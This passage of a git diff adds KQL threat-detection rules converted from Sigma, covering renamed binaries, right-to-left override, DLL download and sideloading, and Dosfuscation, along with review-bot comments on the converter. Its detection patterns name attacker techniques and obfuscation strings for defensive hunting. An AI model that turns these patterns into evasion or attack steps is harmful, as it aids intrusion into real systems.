"🫱🏿‍🫲🏾" or ProcessCommandLine contains "🫦" or ProcessCommandLine contains "🫅" or ProcessCommandLine contains "🫅🏻" or ProcessCommandLine contains "🫅🏼" or ProcessCommandLine contains "🫅🏽" or ProcessCommandLine contains "🫅🏾" or ProcessCommandLine contains "🫅🏿" or ProcessCommandLine contains "🫃" or ProcessCommandLine contains "🫃🏻" or ProcessCommandLine contains "🫃🏼" or ProcessCommandLine contains "🫃🏽" or ProcessCommandLine contains "🫃🏾" or ProcessCommandLine contains "🫃🏿" or ProcessCommandLine contains "🫄" or ProcessCommandLine contains "🫄🏻" or ProcessCommandLine contains "🫄🏼" or ProcessCommandLine contains "🫄🏽" or ProcessCommandLine contains "🫄🏾" or ProcessCommandLine contains "🫄🏿" or ProcessCommandLine contains "🧌" or ProcessCommandLine contains "🪸" or ProcessCommandLine contains "🪷" or ProcessCommandLine contains "🪹" or ProcessCommandLine contains "🪺" or ProcessCommandLine contains "🫘" or ProcessCommandLine contains "🫗" or ProcessCommandLine contains "🫙" or ProcessCommandLine contains "🛝" or ProcessCommandLine contains "🛞" or ProcessCommandLine contains "🛟" or ProcessCommandLine contains "🪬" or ProcessCommandLine contains "🪩" or ProcessCommandLine contains "🪫" or ProcessCommandLine contains "🩼" or ProcessCommandLine contains "🩻" or ProcessCommandLine contains "🫧" or ProcessCommandLine contains "🪪" or ProcessCommandLine contains "🟰" or ProcessCommandLine contains "😮‍💨" or ProcessCommandLine contains "😵‍💫" or ProcessCommandLine contains "😶‍🌫️" or ProcessCommandLine contains "❤️‍🔥" or ProcessCommandLine contains "❤️‍🩹" or ProcessCommandLine contains "🧔‍♀️" or ProcessCommandLine contains "🧔🏻‍♀️" or ProcessCommandLine contains "🧔🏼‍♀️" or ProcessCommandLine contains "🧔🏽‍♀️" or ProcessCommandLine contains "🧔🏾‍♀️" or ProcessCommandLine contains "🧔🏿‍♀️" or ProcessCommandLine contains "🧔‍♂️" or ProcessCommandLine contains "🧔🏻‍♂️" or ProcessCommandLine contains "🧔🏼‍♂️" or ProcessCommandLine contains "🧔🏽‍♂️" or ProcessCommandLine contains "🧔🏾‍♂️" or ProcessCommandLine contains 
"🧔🏿‍♂️" or ProcessCommandLine contains "💑🏻" or ProcessCommandLine contains "💑🏼" or ProcessCommandLine contains "💑🏽" or ProcessCommandLine contains "💑🏾" or ProcessCommandLine contains "💑🏿" or ProcessCommandLine contains "💏🏻" or ProcessCommandLine contains "💏🏼" or ProcessCommandLine contains "💏🏽" or ProcessCommandLine contains "💏🏾" or ProcessCommandLine contains "💏🏿" or ProcessCommandLine contains "👨🏻‍❤️‍👨🏻" or ProcessCommandLine contains "👨🏻‍❤️‍👨🏼" or ProcessCommandLine contains "👨🏻‍❤️‍👨🏽" or ProcessCommandLine contains "👨🏻‍❤️‍👨🏾" or ProcessCommandLine contains "👨🏻‍❤️‍👨🏿" or ProcessCommandLine contains "👨🏼‍❤️‍👨🏻" or ProcessCommandLine contains "👨🏼‍❤️‍👨🏼" or ProcessCommandLine contains "👨🏼‍❤️‍👨🏽" or ProcessCommandLine contains "👨🏼‍❤️‍👨🏾" or ProcessCommandLine contains "👨🏼‍❤️‍👨🏿" or ProcessCommandLine contains "👨🏽‍❤️‍👨🏻" or ProcessCommandLine contains "👨🏽‍❤️‍👨🏼" or ProcessCommandLine contains "👨🏽‍❤️‍👨🏽" or ProcessCommandLine contains "👨🏽‍❤️‍👨🏾" or ProcessCommandLine contains "👨🏽‍❤️‍👨🏿" or ProcessCommandLine contains "👨🏾‍❤️‍👨🏻" or ProcessCommandLine contains "👨🏾‍❤️‍👨🏼" or ProcessCommandLine contains "👨🏾‍❤️‍👨🏽" or ProcessCommandLine contains "👨🏾‍❤️‍👨🏾" or ProcessCommandLine contains "👨🏾‍❤️‍👨🏿" or ProcessCommandLine contains "👨🏿‍❤️‍👨🏻" or ProcessCommandLine contains "👨🏿‍❤️‍👨🏼" or ProcessCommandLine contains "👨🏿‍❤️‍👨🏽" or ProcessCommandLine contains "👨🏿‍❤️‍👨🏾" or ProcessCommandLine contains "👨🏿‍❤️‍👨🏿" or ProcessCommandLine contains "👩🏻‍❤️‍👨🏻" or ProcessCommandLine contains "👩🏻‍❤️‍👨🏼" or ProcessCommandLine contains "👩🏻‍❤️‍👨🏽" or ProcessCommandLine contains "👩🏻‍❤️‍👨🏾" or ProcessCommandLine contains "👩🏻‍❤️‍👨🏿" or ProcessCommandLine contains "👩🏻‍❤️‍👩🏻" or ProcessCommandLine contains "👩🏻‍❤️‍👩🏼" or ProcessCommandLine contains "👩🏻‍❤️‍👩🏽" or ProcessCommandLine contains "👩🏻‍❤️‍👩🏾" or ProcessCommandLine contains "👩🏻‍❤️‍👩🏿" or ProcessCommandLine contains "👩🏼‍❤️‍👨🏻" or ProcessCommandLine contains "👩🏼‍❤️‍👨🏼" or ProcessCommandLine contains "👩🏼‍❤️‍👨🏽" or ProcessCommandLine contains 
"👩🏼‍❤️‍👨🏾" or ProcessCommandLine contains "👩🏼‍❤️‍👨🏿" or ProcessCommandLine contains "👩🏼‍❤️‍👩🏻" or ProcessCommandLine contains "👩🏼‍❤️‍👩🏼" or ProcessCommandLine contains "👩🏼‍❤️‍👩🏽" or ProcessCommandLine contains "👩🏼‍❤️‍👩🏾" or ProcessCommandLine contains "👩🏼‍❤️‍👩🏿" or ProcessCommandLine contains "👩🏽‍❤️‍👨🏻" or ProcessCommandLine contains "👩🏽‍❤️‍👨🏼" or ProcessCommandLine contains "👩🏽‍❤️‍👨🏽" or ProcessCommandLine contains "👩🏽‍❤️‍👨🏾" or ProcessCommandLine contains "👩🏽‍❤️‍👨🏿" or ProcessCommandLine contains "👩🏽‍❤️‍👩🏻" or ProcessCommandLine contains "👩🏽‍❤️‍👩🏼" or ProcessCommandLine contains "👩🏽‍❤️‍👩🏽" or ProcessCommandLine contains "👩🏽‍❤️‍👩🏾" or ProcessCommandLine contains "👩🏽‍❤️‍👩🏿" or ProcessCommandLine contains "👩🏾‍❤️‍👨🏻" or ProcessCommandLine contains "👩🏾‍❤️‍👨🏼" or ProcessCommandLine contains "👩🏾‍❤️‍👨🏽" or ProcessCommandLine contains "👩🏾‍❤️‍👨🏾" or ProcessCommandLine contains "👩🏾‍❤️‍👨🏿" or ProcessCommandLine contains "👩🏾‍❤️‍👩🏻" or ProcessCommandLine contains "👩🏾‍❤️‍👩🏼" or ProcessCommandLine contains "👩🏾‍❤️‍👩🏽" or ProcessCommandLine contains "👩🏾‍❤️‍👩🏾" or ProcessCommandLine contains "👩🏾‍❤️‍👩🏿" or ProcessCommandLine contains "👩🏿‍❤️‍👨🏻" or ProcessCommandLine contains "👩🏿‍❤️‍👨🏼" or ProcessCommandLine contains "👩🏿‍❤️‍👨🏽" or ProcessCommandLine contains "👩🏿‍❤️‍👨🏾" or ProcessCommandLine contains "👩🏿‍❤️‍👨🏿" or ProcessCommandLine contains "👩🏿‍❤️‍👩🏻" or ProcessCommandLine contains "👩🏿‍❤️‍👩🏼" or ProcessCommandLine contains "👩🏿‍❤️‍👩🏽" or ProcessCommandLine contains "👩🏿‍❤️‍👩🏾" or ProcessCommandLine contains "👩🏿‍❤️‍👩🏿" or ProcessCommandLine contains "🧑🏻‍❤️‍🧑🏼" or ProcessCommandLine contains "🧑🏻‍❤️‍🧑🏽" or ProcessCommandLine contains "🧑🏻‍❤️‍🧑🏾" or ProcessCommandLine contains "🧑🏻‍❤️‍🧑🏿" or ProcessCommandLine contains "🧑🏼‍❤️‍🧑🏻" or ProcessCommandLine contains "🧑🏼‍❤️‍🧑🏽" or ProcessCommandLine contains "🧑🏼‍❤️‍🧑🏾" or ProcessCommandLine contains "🧑🏼‍❤️‍🧑🏿" or ProcessCommandLine contains "🧑🏽‍❤️‍🧑🏻" or ProcessCommandLine contains "🧑🏽‍❤️‍🧑🏼" or ProcessCommandLine contains "🧑🏽‍❤️‍🧑🏾" or 
ProcessCommandLine contains "🧑🏽‍❤️‍🧑🏿" or ProcessCommandLine contains "🧑🏾‍❤️‍🧑🏻" or ProcessCommandLine contains "🧑🏾‍❤️‍🧑🏼" or ProcessCommandLine contains "🧑🏾‍❤️‍🧑🏽" or ProcessCommandLine contains "🧑🏾‍❤️‍🧑🏿" or ProcessCommandLine contains "🧑🏿‍❤️‍🧑🏻" or ProcessCommandLine contains "🧑🏿‍❤️‍🧑🏼" or ProcessCommandLine contains "🧑🏿‍❤️‍🧑🏽" or ProcessCommandLine contains "🧑🏿‍❤️‍🧑🏾" or ProcessCommandLine contains "👨🏻‍❤️‍💋‍👨🏻" or ProcessCommandLine contains "👨🏻‍❤️‍💋‍👨🏼" or ProcessCommandLine contains "👨🏻‍❤️‍💋‍👨🏽" or ProcessCommandLine contains "👨🏻‍❤️‍💋‍👨🏾" or ProcessCommandLine contains "👨🏻‍❤️‍💋‍👨🏿" or ProcessCommandLine contains "👨🏼‍❤️‍💋‍👨🏻" or ProcessCommandLine contains "👨🏼‍❤️‍💋‍👨🏼" or ProcessCommandLine contains "👨🏼‍❤️‍💋‍👨🏽" or ProcessCommandLine contains "👨🏼‍❤️‍💋‍👨🏾" or ProcessCommandLine contains "👨🏼‍❤️‍💋‍👨🏿" or ProcessCommandLine contains "👨🏽‍❤️‍💋‍👨🏻" or ProcessCommandLine contains "👨🏽‍❤️‍💋‍👨🏼" or ProcessCommandLine contains "👨🏽‍❤️‍💋‍👨🏽" or ProcessCommandLine contains "👨🏽‍❤️‍💋‍👨🏾" or ProcessCommandLine contains "👨🏽‍❤️‍💋‍👨🏿" or ProcessCommandLine contains "👨🏾‍❤️‍💋‍👨🏻" or ProcessCommandLine contains "👨🏾‍❤️‍💋‍👨🏼" or ProcessCommandLine contains "👨🏾‍❤️‍💋‍👨🏽" or ProcessCommandLine contains "👨🏾‍❤️‍💋‍👨🏾" or ProcessCommandLine contains "👨🏾‍❤️‍💋‍👨🏿" or ProcessCommandLine contains "👨🏿‍❤️‍💋‍👨🏻" or ProcessCommandLine contains "👨🏿‍❤️‍💋‍👨🏼" or ProcessCommandLine contains "👨🏿‍❤️‍💋‍👨🏽" or ProcessCommandLine contains "👨🏿‍❤️‍💋‍👨🏾" or ProcessCommandLine contains "👨🏿‍❤️‍💋‍👨🏿" or ProcessCommandLine contains "👩🏻‍❤️‍💋‍👨🏻" or ProcessCommandLine contains "👩🏻‍❤️‍💋‍👨🏼" or ProcessCommandLine contains "👩🏻‍❤️‍💋‍👨🏽" or ProcessCommandLine contains "👩🏻‍❤️‍💋‍👨🏾" or ProcessCommandLine contains "👩🏻‍❤️‍💋‍👨🏿" or ProcessCommandLine contains "👩🏻‍❤️‍💋‍👩🏻" or ProcessCommandLine contains "👩🏻‍❤️‍💋‍👩🏼" or ProcessCommandLine contains "👩🏻‍❤️‍💋‍👩🏽" or ProcessCommandLine contains "👩🏻‍❤️‍💋‍👩🏾" or ProcessCommandLine contains "👩🏻‍❤️‍💋‍👩🏿" or ProcessCommandLine contains "👩🏼‍❤️‍💋‍👨🏻" or ProcessCommandLine contains 
"👩🏼‍❤️‍💋‍👨🏼" or ProcessCommandLine contains "👩🏼‍❤️‍💋‍👨🏽" or ProcessCommandLine contains "👩🏼‍❤️‍💋‍👨🏾" or ProcessCommandLine contains "👩🏼‍❤️‍💋‍👨🏿" or ProcessCommandLine contains "👩🏼‍❤️‍💋‍👩🏻" or ProcessCommandLine contains "👩🏼‍❤️‍💋‍👩🏼" or ProcessCommandLine contains "👩🏼‍❤️‍💋‍👩🏽" or ProcessCommandLine contains "👩🏼‍❤️‍💋‍👩🏾" or ProcessCommandLine contains "👩🏼‍❤️‍💋‍👩🏿" or ProcessCommandLine contains "👩🏽‍❤️‍💋‍👨🏻" or ProcessCommandLine contains "👩🏽‍❤️‍💋‍👨🏼" or ProcessCommandLine contains "👩🏽‍❤️‍💋‍👨🏽" or ProcessCommandLine contains "👩🏽‍❤️‍💋‍👨🏾" or ProcessCommandLine contains "👩🏽‍❤️‍💋‍👨🏿" or ProcessCommandLine contains "👩🏽‍❤️‍💋‍👩🏻" or ProcessCommandLine contains "👩🏽‍❤️‍💋‍👩🏼" or ProcessCommandLine contains "👩🏽‍❤️‍💋‍👩🏽" or ProcessCommandLine contains "👩🏽‍❤️‍💋‍👩🏾" or ProcessCommandLine contains "👩🏽‍❤️‍💋‍👩🏿" or ProcessCommandLine contains "👩🏾‍❤️‍💋‍👨🏻" or ProcessCommandLine contains "👩🏾‍❤️‍💋‍👨🏼" or ProcessCommandLine contains "👩🏾‍❤️‍💋‍👨🏽" or ProcessCommandLine contains "👩🏾‍❤️‍💋‍👨🏾" or ProcessCommandLine contains "👩🏾‍❤️‍💋‍👨🏿" or ProcessCommandLine contains "👩🏾‍❤️‍💋‍👩🏻" or ProcessCommandLine contains "👩🏾‍❤️‍💋‍👩🏼" or ProcessCommandLine contains "👩🏾‍❤️‍💋‍👩🏽" or ProcessCommandLine contains "👩🏾‍❤️‍💋‍👩🏾" or ProcessCommandLine contains "👩🏾‍❤️‍💋‍👩🏿" or ProcessCommandLine contains "👩🏿‍❤️‍💋‍👨🏻" or ProcessCommandLine contains "👩🏿‍❤️‍💋‍👨🏼" or ProcessCommandLine contains "👩🏿‍❤️‍💋‍👨🏽" or ProcessCommandLine contains "👩🏿‍❤️‍💋‍👨🏾" or ProcessCommandLine contains "👩🏿‍❤️‍💋‍👨🏿" or ProcessCommandLine contains "👩🏿‍❤️‍💋‍👩🏻" or ProcessCommandLine contains "👩🏿‍❤️‍💋‍👩🏼" or ProcessCommandLine contains "👩🏿‍❤️‍💋‍👩🏽" or ProcessCommandLine contains "👩🏿‍❤️‍💋‍👩🏾" or ProcessCommandLine contains "👩🏿‍❤️‍💋‍👩🏿" or ProcessCommandLine contains "🧑🏻‍❤️‍💋‍🧑🏼" or ProcessCommandLine contains "🧑🏻‍❤️‍💋‍🧑🏽" or ProcessCommandLine contains "🧑🏻‍❤️‍💋‍🧑🏾" or ProcessCommandLine contains "🧑🏻‍❤️‍💋‍🧑🏿" or ProcessCommandLine contains "🧑🏼‍❤️‍💋‍🧑🏻" or ProcessCommandLine contains "🧑🏼‍❤️‍💋‍🧑🏽" or ProcessCommandLine contains "🧑🏼‍❤️‍💋‍🧑🏾" or 
ProcessCommandLine contains "🧑🏼‍❤️‍💋‍🧑🏿" or ProcessCommandLine contains "🧑🏽‍❤️‍💋‍🧑🏻" or ProcessCommandLine contains "🧑🏽‍❤️‍💋‍🧑🏼" or ProcessCommandLine contains "🧑🏽‍❤️‍💋‍🧑🏾" or ProcessCommandLine contains "🧑🏽‍❤️‍💋‍🧑🏿" or ProcessCommandLine contains "🧑🏾‍❤️‍💋‍🧑🏻" or ProcessCommandLine contains "🧑🏾‍❤️‍💋‍🧑🏼" or ProcessCommandLine contains "🧑🏾‍❤️‍💋‍🧑🏽" or ProcessCommandLine contains "🧑🏾‍❤️‍💋‍🧑🏿" or ProcessCommandLine contains "🧑🏿‍❤️‍💋‍🧑🏻" or ProcessCommandLine contains "🧑🏿‍❤️‍💋‍🧑🏼" or ProcessCommandLine contains "🧑🏿‍❤️‍💋‍🧑🏽" or ProcessCommandLine contains "🧑🏿‍❤️‍💋‍🧑🏾" \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/potential_defense_evasion_via_binary_rename.kql b/KQL/rules/windows/process_creation/potential_defense_evasion_via_binary_rename.kql new file mode 100644 index 00000000..cf1fc9dd --- /dev/null +++ b/KQL/rules/windows/process_creation/potential_defense_evasion_via_binary_rename.kql 
@@ -0,0 +1,12 @@
+// Title: Potential Defense Evasion Via Binary Rename
+// Author: Matthew Green @mgreen27, Ecco, James Pemberton @4A616D6573, oscd.community, Andreas Hunkeler (@Karneades)
+// Date: 2019-06-15
+// Level: medium
+// Description: Detects the execution of a renamed binary often used by attackers or malware leveraging new Sysmon OriginalFileName datapoint.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1036.003
+// False Positives:
+// - Custom applications use renamed binaries adding slight change to binary name. Typically this is easy to spot and add to whitelist
+
+DeviceProcessEvents
+| where (ProcessVersionInfoOriginalFileName in~ ("Cmd.Exe", "CONHOST.EXE", "7z.exe", "7za.exe", "WinRAR.exe", "wevtutil.exe", "net.exe", "net1.exe", "netsh.exe", "InstallUtil.exe")) and (not((FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\conhost.exe" or FolderPath endswith "\\7z.exe" or FolderPath endswith "\\7za.exe" or FolderPath endswith "\\WinRAR.exe" or FolderPath endswith "\\wevtutil.exe" or FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe" or FolderPath endswith "\\netsh.exe" or FolderPath endswith "\\InstallUtil.exe")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_defense_evasion_via_rename_of_highly_relevant_binaries.kql b/KQL/rules/windows/process_creation/potential_defense_evasion_via_rename_of_highly_relevant_binaries.kql
new file mode 100644
index 00000000..0505dd7f
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_defense_evasion_via_rename_of_highly_relevant_binaries.kql
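Review bot: The generated header has no line that identifies the upstream Sigma rule (its `id`, `status` or `references`), so once a converted rule is tuned in this repository there is no reliable way to map it back to the Sigma source that produced it; this applies to every rule file in this diff, and the fix belongs in the converter rather than in the individual files. A `// Sigma ID: <id>` line after `// Title:` (and `// Status: <status>` where the source has one) would keep that link, and a `// References:` line would preserve the context reviewers need to judge the false-positive notes. The `// Date:` line appears to carry the Sigma `date` field; if the converter can also read `modified`, emitting it would tell reviewers which rules actually changed in the upstream pull.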
@@ -0,0 +1,13 @@
+// Title: Potential Defense Evasion Via Rename Of Highly Relevant Binaries
+// Author: Matthew Green - @mgreen27, Florian Roth (Nextron Systems), frack113
+// Date: 2019-06-15
+// Level: high
+// Description: Detects the execution of a renamed binary often used by attackers or malware leveraging new Sysmon OriginalFileName datapoint.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1036.003, car.2013-05-009
+// False Positives:
+// - Custom applications use renamed binaries adding slight change to binary name. Typically this is easy to spot and add to whitelist
+// - PsExec installed via Windows Store doesn't contain original filename field (False negative)
+
+DeviceProcessEvents
+| where (ProcessVersionInfoFileDescription =~ "Execute processes remotely" or ProcessVersionInfoProductName =~ "Sysinternals PsExec" or (ProcessVersionInfoFileDescription startswith "Windows PowerShell" or ProcessVersionInfoFileDescription startswith "pwsh") or (ProcessVersionInfoOriginalFileName in~ ("certutil.exe", "cmstp.exe", "cscript.exe", "IE4UINIT.EXE", "mshta.exe", "msiexec.exe", "msxsl.exe", "powershell_ise.exe", "powershell.exe", "psexec.c", "psexec.exe", "psexesvc.exe", "pwsh.dll", "reg.exe", "regsvr32.exe", "rundll32.exe", "WerMgr", "wmic.exe", "wscript.exe"))) and (not((FolderPath endswith "\\certutil.exe" or FolderPath endswith "\\cmstp.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\ie4uinit.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\msiexec.exe" or FolderPath endswith "\\msxsl.exe" or FolderPath endswith "\\powershell_ise.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\psexec.exe" or FolderPath endswith "\\psexec64.exe" or FolderPath endswith "\\PSEXESVC.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\reg.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\wermgr.exe" or FolderPath endswith "\\wmic.exe" or FolderPath endswith "\\wscript.exe")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_defense_evasion_via_right_to_left_override.kql b/KQL/rules/windows/process_creation/potential_defense_evasion_via_right_to_left_override.kql
new file mode 100644
index 00000000..36d5fd90
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_defense_evasion_via_right_to_left_override.kql
@@ -0,0 +1,13 @@
+// Title: Potential Defense Evasion Via Right-to-Left Override
+// Author: Micah Babinski, @micahbabinski, Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2023-02-15
+// Level: high
+// Description: Detects the presence of the "u202+E" character, which causes a terminal, browser, or operating system to render text in a right-to-left sequence.
+// This is used as an obfuscation and masquerading techniques.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1036.002
+// False Positives:
+// - Commandlines that contains scriptures such as arabic or hebrew might make use of this character
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "\\u202e" or ProcessCommandLine contains "[U+202E]"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_discovery_activity_via_dnscmd_exe.kql b/KQL/rules/windows/process_creation/potential_discovery_activity_via_dnscmd_exe.kql
new file mode 100644
index 00000000..ed4a9c0d
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_discovery_activity_via_dnscmd_exe.kql
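Review bot: The literal `"\\u202e"` on the `| where` line is the six ASCII characters `\u202e` once KQL unescapes the doubled backslash, not the U+202E RIGHT-TO-LEFT OVERRIDE code point the description refers to, so a command line that actually carries the override character only matches if the sensor happens to render it as that escape text or as `[U+202E]`. Whether the backslash was doubled by the converter or is already literal in the upstream Sigma value should be checked; the intended condition is the code point itself, i.e. the character embedded in the string literal, with `[U+202E]` kept as the fallback for pipelines that print non-printables that way. The homoglyph rule later in this diff embeds its Cyrillic and Greek characters directly, so the converter is able to emit raw code points when the source value contains them.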
@@ -0,0 +1,12 @@
+// Title: Potential Discovery Activity Via Dnscmd.EXE
+// Author: @gott_cyber
+// Date: 2022-07-31
+// Level: medium
+// Description: Detects an attempt to leverage dnscmd.exe to enumerate the DNS zones of a domain. DNS zones used to host the DNS records for a particular domain.
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.execution
+// False Positives:
+// - Legitimate administration use
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "/enumrecords" or ProcessCommandLine contains "/enumzones" or ProcessCommandLine contains "/ZonePrint" or ProcessCommandLine contains "/info") and FolderPath endswith "\\dnscmd.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_dll_file_download_via_powershell_invoke_webrequest.kql b/KQL/rules/windows/process_creation/potential_dll_file_download_via_powershell_invoke_webrequest.kql
new file mode 100644
index 00000000..28c36ac5
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_dll_file_download_via_powershell_invoke_webrequest.kql
@@ -0,0 +1,10 @@
+// Title: Potential DLL File Download Via PowerShell Invoke-WebRequest
+// Author: Florian Roth (Nextron Systems), Hieu Tran
+// Date: 2023-03-13
+// Level: medium
+// Description: Detects potential DLL files being downloaded using the PowerShell Invoke-WebRequest or Invoke-RestMethod cmdlets.
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.execution, attack.t1059.001, attack.t1105
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "Invoke-RestMethod " or ProcessCommandLine contains "Invoke-WebRequest " or ProcessCommandLine contains "IRM " or ProcessCommandLine contains "IWR ") and (ProcessCommandLine contains "http" and ProcessCommandLine contains "OutFile" and ProcessCommandLine contains ".dll")
\ No newline at end of file
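Review bot: `ProcessCommandLine contains "IRM "` and `contains "IWR "` on the `| where` line are case-insensitive substring tests, so they also match any argument that merely ends in those letters followed by a space (`-Confirm ` is the obvious one), not only the `irm`/`iwr` cmdlet aliases; the `http`/`OutFile`/`.dll` conjunction keeps the noise down, but a term match such as `ProcessCommandLine has "IRM" or ProcessCommandLine has "IWR"` binds to whole tokens and is the idiomatic KQL form for an alias check. That is a semantic departure from Sigma's `contains`, so it belongs in the converter's modifier mapping or a curated override rather than a hand edit of the generated file.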
diff --git a/KQL/rules/windows/process_creation/potential_dll_injection_or_execution_using_tracker_exe.kql b/KQL/rules/windows/process_creation/potential_dll_injection_or_execution_using_tracker_exe.kql
new file mode 100644
index 00000000..f6d7fa30
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_dll_injection_or_execution_using_tracker_exe.kql
@@ -0,0 +1,10 @@
+// Title: Potential DLL Injection Or Execution Using Tracker.exe
+// Author: Avneet Singh @v3t0_, oscd.community
+// Date: 2020-10-18
+// Level: medium
+// Description: Detects potential DLL injection and execution using "Tracker.exe"
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.defense-evasion, attack.t1055.001
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains " /d " or ProcessCommandLine contains " /c ") and (FolderPath endswith "\\tracker.exe" or ProcessVersionInfoFileDescription =~ "Tracker")) and (not((ProcessCommandLine contains " /ERRORREPORT:PROMPT " or (InitiatingProcessFolderPath endswith "\\Msbuild\\Current\\Bin\\MSBuild.exe" or InitiatingProcessFolderPath endswith "\\Msbuild\\Current\\Bin\\amd64\\MSBuild.exe"))))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_dll_injection_via_acccheckconsole.kql b/KQL/rules/windows/process_creation/potential_dll_injection_via_acccheckconsole.kql
new file mode 100644
index 00000000..611e3534
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_dll_injection_via_acccheckconsole.kql
@@ -0,0 +1,14 @@
+// Title: Potential DLL Injection Via AccCheckConsole
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-01-06
+// Level: medium
+// Description: Detects the execution "AccCheckConsole" a command-line tool for verifying the accessibility implementation of an application's UI.
+// One of the tests that this checker can run are called "verification routine", which tests for things like Consistency, Navigation, etc.
+// The tool allows a user to provide a DLL that can contain a custom "verification routine". An attacker can build such DLLs and pass it via the CLI, which would then be loaded in the context of the "AccCheckConsole" utility.
+// MITRE Tactic: Execution
+// Tags: attack.execution, detection.threat-hunting
+// False Positives:
+// - Legitimate use of the UI Accessibility Checker
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " -hwnd" or ProcessCommandLine contains " -process " or ProcessCommandLine contains " -window ") and (FolderPath endswith "\\AccCheckConsole.exe" or ProcessVersionInfoOriginalFileName =~ "AccCheckConsole.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_dll_sideloading_via_deviceenroller_exe.kql b/KQL/rules/windows/process_creation/potential_dll_sideloading_via_deviceenroller_exe.kql
new file mode 100644
index 00000000..60eff39e
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_dll_sideloading_via_deviceenroller_exe.kql
@@ -0,0 +1,11 @@
+// Title: Potential DLL Sideloading Via DeviceEnroller.EXE
+// Author: @gott_cyber
+// Date: 2022-08-29
+// Level: medium
+// Description: Detects the use of the PhoneDeepLink parameter to potentially sideload a DLL file that does not exist. This non-existent DLL file is named "ShellChromeAPI.dll".
+// Adversaries can drop their own renamed DLL and execute it via DeviceEnroller.exe using this parameter
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.defense-evasion, attack.t1574.001
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "/PhoneDeepLink" and (FolderPath endswith "\\deviceenroller.exe" or ProcessVersionInfoOriginalFileName =~ "deviceenroller.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_dosfuscation_activity.kql b/KQL/rules/windows/process_creation/potential_dosfuscation_activity.kql
new file mode 100644
index 00000000..204f0363
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_dosfuscation_activity.kql
@@ -0,0 +1,10 @@
+// Title: Potential Dosfuscation Activity
+// Author: frack113, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-02-15
+// Level: medium
+// Description: Detects possible payload obfuscation via the commandline
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "^^" or ProcessCommandLine contains "^|^" or ProcessCommandLine contains ",;," or ProcessCommandLine contains ";;;;" or ProcessCommandLine contains ";; ;;" or ProcessCommandLine contains "(,(," or ProcessCommandLine contains "%COMSPEC:~" or ProcessCommandLine contains " c^m^d" or ProcessCommandLine contains "^c^m^d" or ProcessCommandLine contains " c^md" or ProcessCommandLine contains " cm^d" or ProcessCommandLine contains "^cm^d" or ProcessCommandLine contains " s^et " or ProcessCommandLine contains " s^e^t " or ProcessCommandLine contains " se^t "
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_download_upload_activity_using_type_command.kql b/KQL/rules/windows/process_creation/potential_download_upload_activity_using_type_command.kql
new file mode 100644
index 00000000..25801352
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_download_upload_activity_using_type_command.kql
@@ -0,0 +1,10 @@
+// Title: Potential Download/Upload Activity Using Type Command
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-12-14
+// Level: medium
+// Description: Detects usage of the "type" command to download/upload data from WebDAV server
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1105
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "type \\\\" and ProcessCommandLine contains " > ") or (ProcessCommandLine contains "type " and ProcessCommandLine contains " > \\\\")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_dropper_script_execution_via_wscript_cscript.kql b/KQL/rules/windows/process_creation/potential_dropper_script_execution_via_wscript_cscript.kql
new file mode 100644
index 00000000..abc4ecbe
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_dropper_script_execution_via_wscript_cscript.kql
@@ -0,0 +1,12 @@
+// Title: Potential Dropper Script Execution Via WScript/CScript
+// Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2019-01-16
+// Level: medium
+// Description: Detects wscript/cscript executions of scripts located in user directories
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.005, attack.t1059.007
+// False Positives:
+// - Some installers might generate a similar behavior. An initial baseline is required
+
+DeviceProcessEvents
